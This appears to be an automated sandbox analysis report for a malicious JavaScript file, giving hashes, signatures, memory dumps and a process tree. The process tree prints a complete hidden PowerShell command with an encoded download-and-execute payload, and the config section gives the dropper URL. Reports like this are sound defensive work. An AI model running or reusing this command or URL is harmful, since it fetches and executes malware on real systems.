Analysis

  • max time kernel
    121s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    30/12/2023, 03:50

General

  • Target

    0d7beb764ee9f425e8d015e13c60d57d.js

  • Size

    145KB

  • MD5

    0d7beb764ee9f425e8d015e13c60d57d

  • SHA1

    7ad2a1ef9a66f5ce1711ad1bf9f280f2340d414d

  • SHA256

    a76be8cb868c1dc985194d4f0883b17f9c00ed09db6ebf570e8614d09d845079

  • SHA512

    62fdf381b5a905b49d2614bcdec32b198cff3035fe20205fbe67c5b1d3367cedb96241d5b5b59120c3654eaff0b9cf548205d27f44235f6e97714fe9abcfd018

  • SSDEEP

    3072:QxW1aqI8XXazWO14a9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kVc:HIgqzLCa9Ry9RuXqW4SzUHmLKeMMU7GO

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
    URLs
  • ps1.dropper
    http://smart-integrator.hr/pornhub.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\0d7beb764ee9f425e8d015e13c60d57d.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2712

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2712-5-0x000000001B220000-0x000000001B502000-memory.dmp

    Filesize

    2.9MB

  • memory/2712-6-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

  • memory/2712-7-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2712-8-0x00000000026A0000-0x0000000002720000-memory.dmp

    Filesize

    512KB

  • memory/2712-9-0x00000000026A0000-0x0000000002720000-memory.dmp

    Filesize

    512KB

  • memory/2712-10-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2712-11-0x00000000026A0000-0x0000000002720000-memory.dmp

    Filesize

    512KB

  • memory/2712-12-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2712-13-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

    Filesize

    9.6MB